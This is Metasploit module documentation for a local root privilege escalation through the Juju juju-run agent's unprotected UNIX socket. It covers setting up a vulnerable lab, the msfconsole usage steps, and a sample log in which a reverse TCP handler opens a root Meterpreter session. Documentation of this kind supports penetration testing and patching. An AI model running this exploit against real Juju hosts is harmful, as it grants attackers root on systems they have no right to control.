## Vulnerable Application

### Description

  This module attempts to gain root privileges on Juju agent systems running the juju-run agent utility.

  Juju agent systems running agent tools prior to version 1.25.12, 2.0.x before 2.0.4, and 2.1.x before 2.1.3, provide a UNIX domain socket to manage software ("units") without setting appropriate permissions, allowing unprivileged local users to execute arbitrary commands as root.

  [Juju](https://juju.ubuntu.com/) is an open source application modeling tool designed for devops to deploy, configure, scale, and operate software on public and private clouds.

  * Homepage: https://juju.ubuntu.com/
  * Github: https://github.com/juju/juju

  This module has been tested successfully with Juju agent tools:

  * Versions 1.18.4, 1.25.5 and 1.25.9 on Ubuntu 14.04.1 LTS x86

  Deployed by Juju:

  * Versions 1.18.1-trusty-amd64 and 1.25.6-trusty-amd64 on Ubuntu 14.04.1 LTS x86_64


### Installation

  Two systems are required. The first runs Juju and the second runs the Juju agent tools.

  Ensure the client system has SSH installed and network accessible.

  The following installation instructions are for Ubuntu 14.04.1 LTS ("trusty").

  ```sh
  # List available juju packages
  apt-cache showpkg juju

  # Install a vulnerable package
  apt-get install juju-core=1.18.1-0ubuntu1

  # Generate a config file
  juju init
  ```

  Edit the `manual` section of the newly generated config file, adding the appropriate `bootstrap-host` and `bootstrap-user` for the client system, ensuring the appropriate `default-series` is set (`trusty` for Ububtu 14.x).

  ```
  manual:
    bootstrap-host: juju-client.local # Remote host
    bootstrap-user: user              # User for SSH access
    default-series: trusty            # Remote host OS series
  ```

  Switch to the `manual` environment and bootstrap the remote host specified above:

  ```sh
  juju switch manual
  juju bootstrap
  ```

  Once the bootstrapping is complete, check if it was successful. You should see a machine with ID# 0:

  ```sh
  juju stat
  ```

  Deploy any unit to the machine with ID# 0. Units can be found in the [Juju store](https://jujucharms.com/store).

  ```sh
  juju deploy zabbix-agent --to 0
  ```

  Check if it worked:

  ```sh
  watch juju stat
  ```


  Optionally, to test various versions of the juju agent utilities, the juju tools can be updated remotely. (Note: Downgrading is more difficult.)

  ```sh
  # You may or may not need to `set-env` the upstream tools URL:
  juju set-env agent-metadata-url=https://streams.canonical.com/juju/tools
  juju set-env agent-stream=proposed

  # Be careful to select a version which exists, otherwise bad things will happen.
  juju upgrade-juju --version 1.25.2
  ```


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. Do: `use exploit/linux/local/juju_run_agent_priv_esc`
  4. Do: `set SESSION [SESSION]`
  5. Do: `check`
  6. Do: `run`
  7. You should get a new root session


## Options

  **SESSION**

  Which session to use, which can be viewed with `sessions`

  **WritableDir**

  A writable directory file system path. (default: `/tmp`)


## Scenarios

  ```
  msf exploit(multi/handler) > use exploit/linux/local/juju_run_agent_priv_esc 
  msf exploit(linux/local/juju_run_agent_priv_esc) > set session 1
  session => 1
  msf exploit(linux/local/juju_run_agent_priv_esc) > run

  [!] SESSION may not be compatible with this module.
  [*] Started reverse TCP handler on 172.16.191.244:4444 
  [*] Trying 3 units...
  [+] Unit "unit-zabbix-agent-1" uses a privileged socket
  [*] Writing '/tmp/.tp9oGmPSvx' (207 bytes) ...
  [*] Sending stage (857352 bytes) to 172.16.191.130
  [*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.130:43760) at 2018-01-13 12:33:48 -0500
  [+] Deleted /tmp/.tp9oGmPSvx

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.130
  OS           : Ubuntu 14.04 (Linux 3.13.0-32-generic)
  Architecture : i686
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  ```

